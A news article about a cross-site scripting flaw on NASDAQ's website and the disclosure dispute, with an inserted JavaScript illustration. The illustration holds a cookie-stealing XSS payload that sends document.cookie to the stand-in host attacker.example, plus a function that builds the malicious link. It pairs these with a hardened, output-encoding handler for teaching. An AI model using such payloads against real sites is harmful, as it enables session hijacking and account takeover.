NASDAQ Fixes XSS 2 Weeks After Bug Reported

NASDAQ took two weeks to patch a cross-site scripting vulnerability on its website discovered by a Swiss pen-testing outfit.

A NASDAQ representative confirmed this morning that a cross-site scripting vulnerability on the exchange’s website discovered by an ethical hacker has been patched.

The issue was reported on Sept. 2 by Ilia Kolochenko, chief executive of High-Tech Bridge, a Swiss penetration testing company. Kolochenko characterized the issue as a relatively simple cross-site scripting vulnerability.

“It’s not something that would shut down the site, but if a good hacker group wanted to hack them, XSS will make that hack simpler for them,” Kolochenko said, adding that it took two weeks for NASDAQ to address the situation and that it did so only after media reports surfaced on the vulnerability.

NASDAQ said it addressed the issue immediately internally.

“We have fixed the vulnerability, and we began working on the issue once it was flagged to us by the High-Tech CEO – we address any and all vulnerabilities identified, whether internally via our standard processes or externally, like the one we received on September 2,” a NASDAQ representative said in an email to Threatpost.

NASDAQ suffered an outage on Aug. 22 that prompted the exchange to shut down for three hours; a software error was blamed. Kolochenko said the outage prompted him to look at the Web platform used by NASDAQ and that he then discovered a Web application vulnerable to cross-site scripting attacks.

“A quick and totally harmless test confirmed an exploitable XSS vulnerability that allows injecting arbitrary HTML and scripting code into webpages,” he said in a statement.

NASDAQ said it validated the claim, as it does with all reported vulnerabilities.

“We take all information security matters seriously,” NASDAQ said. “We work with leading security vendors and have a trained and professional team that evaluates all credible threats across our digital assets.”

Kolochenko said an attacker could use the flaw to reach a protected portion of the NASDAQ environment, such as an administrative portal, by hijacking the session of a legitimate user and then modifying content on the site.

“Assuming the hackers know where this [vulnerable] component is located, he has to find someone from NASDAQ who can access it and send him a link that will exploit the cross-site scripting vulnerability,” Kolochenko said. “When the person who gets the link clicks on it, his cookies or other sensitive information will be sent along. The hacker will receive this information and will be able to log in to an admin panel with the victim’s user name and password and can do any modification on the site he wants.”
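The chain Kolochenko describes (a reflected cross-site scripting flaw, a link sent to someone with admin access, and the victim's cookies shipped to the attacker) is shown below as an added example. It is not part of the original article and is not NASDAQ's code; the search page, the parameter name `q`, the hosts and the cookie values are all assumed for the demonstration. It pairs the vulnerable handler with a hardened one that HTML-encodes the reflected value, and checks whether an `HttpOnly` session cookie would have survived the theft.

```javascript
// Added illustration of the attack chain described above (reflected XSS ->
// cookie theft -> session hijack). Not NASDAQ's code; the page, the "q"
// parameter, the attacker host and the cookie values are constructed samples.

// 1. Attacker's payload: a script that ships the victim's cookies to a host
//    the attacker controls. (attacker.example is a fictional host.)
const ATTACKER_HOST = 'https://attacker.example/collect';
const PAYLOAD =
  `<script>new Image().src=${JSON.stringify(ATTACKER_HOST + '?c=')}` +
  `+encodeURIComponent(document.cookie)</script>`;

// 2. The link the attacker mails to someone with admin access.
//    URLSearchParams percent-encodes the payload so it survives the trip
//    and is decoded again by the server.
function buildAttackUrl(base, payload) {
  const u = new URL(base);
  u.searchParams.set('q', payload);
  return u.toString();
}

// 3a. Vulnerable handler: reflects the query parameter into HTML verbatim.
function renderVulnerable(q) {
  return `<html><body><h1>Search results for ${q}</h1></body></html>`;
}

// 3b. Hardened handler: encodes the five characters that can break out of an
//     HTML text context before reflecting the value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(q) {
  return `<html><body><h1>Search results for ${escapeHtml(q)}</h1></body></html>`;
}

// 4. What the victim's browser would do: request the URL, receive the page,
//    and run any <script> element in it. Only the two facts that matter are
//    modelled: does a script element that talks to the attacker's host end up
//    in the page, and can script read the session cookie at all? A cookie
//    flagged HttpOnly is invisible to document.cookie, so the exfiltration of
//    that cookie only succeeds when the flag is absent.
function simulateVictimVisit(url, render, setCookieHeader) {
  const q = new URL(url).searchParams.get('q');
  const html = render(q);
  const scriptRuns =
    /<script\b[^>]*>[\s\S]*?<\/script>/i.test(html) && html.includes(ATTACKER_HOST);
  const cookieReadable = !/;\s*HttpOnly\b/i.test(setCookieHeader);
  return { scriptRuns, sessionStolen: scriptRuns && cookieReadable };
}

// Constructed inputs for the demo (exchange.example is a fictional host).
const ATTACK_URL = buildAttackUrl('https://exchange.example/search', PAYLOAD);
const WEAK_COOKIE = 'admin_session=0123456789abcdef; Path=/; Secure';
const SAFE_COOKIE = 'admin_session=0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax';

console.log(simulateVictimVisit(ATTACK_URL, renderVulnerable, WEAK_COOKIE)); // { scriptRuns: true, sessionStolen: true }
console.log(simulateVictimVisit(ATTACK_URL, renderVulnerable, SAFE_COOKIE)); // { scriptRuns: true, sessionStolen: false }
console.log(simulateVictimVisit(ATTACK_URL, renderHardened, WEAK_COOKIE));   // { scriptRuns: false, sessionStolen: false }
```

Two points worth noting from the three runs. `HttpOnly` stops this particular payload from reading the session cookie, but the injected script still runs in the admin's browser with the admin's session, so it can issue requests to the admin panel directly; the flag narrows the damage, it does not remove it. Output encoding in the handler is what actually closes the hole, which is why the hardened render reports no script at all.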

Kolochenko said the NASDAQ site offers no channel for reporting security vulnerabilities; NASDAQ denies this, saying such channels exist and are used regularly. Kolochenko contends that NASDAQ moved to act only after two weeks had passed and a barrage of media reports about his discovery appeared over the weekend.

“I have checked all my email and spam folders and I have never ever received a single email from NASDAQ, a NASDAQ contractor, or anyone related to them,” Kolochenko said. “If NASDAQ insists they replied to me, my question is simple: Why after all the articles about the issue didn’t NASDAQ try to contact me again? No one resent the original contact, notified or replied to me.”

This week, meanwhile, U.S. stock exchanges and federal regulators agreed to reforms, including a kill-switch mechanism that would halt trading during emergencies, Reuters reported.

“I stressed the need for all market participants to work collaboratively – together and with the Commission – to strengthen critical market infrastructure and improve its resilience when technology falls short,” said Securities and Exchange Commission chair Mary Jo White.
